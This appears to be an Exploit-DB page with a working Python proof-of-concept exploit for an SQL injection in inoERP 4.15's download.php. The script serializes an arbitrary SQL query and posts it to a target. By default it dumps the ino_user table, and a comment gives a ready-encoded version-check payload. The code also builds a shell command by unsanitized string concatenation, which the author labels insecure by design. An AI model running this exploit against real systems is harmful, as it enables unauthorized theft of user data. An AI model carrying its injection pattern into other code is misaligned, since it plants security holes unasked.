4802945877
10 changes to exploits/shellcodes Mobatek MobaXterm 12.1 - Buffer Overflow (SEH) thesystem App 1.0 - Persistent Cross-Site Scripting InoERP 0.7.2 - Persistent Cross-Site Scripting thesystem App 1.0 - 'server_name' SQL Injection thesystem App 1.0 - 'username' SQL Injection V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting
47 lines
No EOL
1.3 KiB
Text
47 lines
No EOL
1.3 KiB
Text
# Exploit Title: inoERP 4.15 - 'download' SQL Injection
|
|
# Date: 2019-09-13
|
|
# Exploit Author: Semen Alexandrovich Lyhin
|
|
# Vendor Homepage: http://inoideas.org/
|
|
# Version: 4.15
|
|
# CVE: N/A
|
|
|
|
# A malicious query can be sent in base64 encoding to unserialize() function.
|
|
# It can be deserialized without any sanitization then.
|
|
# After it, it gets passed directly to the SQL query.
|
|
|
|
|
|
#!/bin/python
|
|
|
|
import os
|
|
import base64
|
|
import requests
|
|
import sys
|
|
|
|
def generatePayload(query):
|
|
#THIS FUNCTION IS INSECURE BY DESIGN
|
|
b64_query = base64.b64encode(query);
|
|
return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
|
|
|
|
|
|
def ExecSQL(query):
|
|
data = {"data":query,
|
|
"data_type":"sql_query"}
|
|
|
|
r = requests.post("http://" + ip + "/download.php", data=data)
|
|
return r.content
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
|
if len(sys.argv) != 3:
|
|
print '(+) usage: %s <target> ' % sys.argv[0]
|
|
print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]
|
|
exit()
|
|
|
|
ip = sys.argv[1] + "/" + sys.argv[2]
|
|
|
|
#if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==
|
|
|
|
data = r"select * from ino_user;"
|
|
|
|
print ExecSQL(generatePayload(data)); |